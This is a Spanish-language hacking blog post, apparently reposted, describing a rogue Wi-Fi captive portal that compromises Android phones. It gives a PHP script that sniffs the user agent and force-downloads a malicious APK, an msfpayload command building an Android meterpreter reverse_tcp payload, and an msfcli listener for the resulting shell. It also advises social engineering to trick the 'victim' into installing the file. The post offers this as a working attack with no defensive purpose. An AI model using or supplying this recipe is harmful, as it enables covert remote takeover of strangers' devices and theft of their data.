Banner 1

Punto de acceso falso: seduciendo androides

La idea es que cuando un cliente con un dispositivo Android se conecte, inicie automáticamente la descarga de una aplicación maliciosa, todo esto mediante un simple script en php y metasploit ;).

  Lo primero será el script que verá la víctima al conectarse al portal cautivo, como he comentado antes éste está escrito en php y es el siguiente:


 

         $userAgent = $_SERVER[HTTP_USER_AGENT];
        $userAgent = strtolower ($userAgent);
        $file = "downloads/archivo.apk";
        if(strpos($userAgent, "android") !== false)
        {
                if (file_exists($file)) {
                        header('Content-Description: File Transfer');
                        header('Content-Type: application/vnd.android.package-archive');
                        header('Content-Disposition: attachment; filename='.basename($file));
                        header('Content-Transfer-Encoding: binary');
                        header('Expires: 0');
                        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
                        header('Pragma: public');
                        header('Content-Length: ' . filesize($file));
                        ob_clean();
                        flush();
                        readfile($file);
                }

        }
?>
  La utilidad de dicho script es detectar mediante el User Agent el sistema operativo que visita la página y, si éste es un Android, automáticamente descargara el archivo apk creado para la ocasión.

  Para el ejecutable malicioso me aproveché de que metasploit ya contenía en su base de datos una versión de meterpreter, así que previo msfupdate con la ayuda de msfpayload me dispuse a generar el archivo apk que la víctima instalaría en su dispositivo:

msfpayload android/meterpreter/reverse_tcp LHOST=mi_ip R > archivo.apk

Ahora solo queda colocar el archivo.apk en la carpeta downloads en /var/www/ y cuando la desdichada víctima acceda al portal cautivo se le descargará y sugerirá la instalación de nuestro perverso archivo (para todo esto es importante jugar con la ingeniería social ;) ). Cuando el archivo sea instalado y ejecutado la víctima establecerá conexión con nuestro metasploit, aunque antes hay que ponerlo a la escucha:

msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=0.0.0.0 E

 Y listo, tendremos una conexión mediante meterpreter con la víctima, aunque hay que tener en cuenta que el numero de posibilidades para "interactuar" con el objetivo es menor si es comparada con sistemas Windows o GNU/Linux.





  En resumen, hemos visto como con un sencillo script podemos dirigir ataques a distintos sistemas operativos en función del User Agent del navegador que acceda a la web. Además hay que tener en cuenta el factor de la ingeniería social, puesto que es importante mostrar una web creíble y una justificación por la que la víctima debería instalar nuestro apk.


Fuentes:


Nos leemos en breve.

FUENTE:http://blog.0verl0ad.com/2013/07/punto-de-acceso-falso-seduciendo.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+0v3rl04d1nTh3N3t+%280V3RL04D+1N+TH3+N3T%29

No hay comentarios:

Powered by Bad Robot
Helped by Blackubay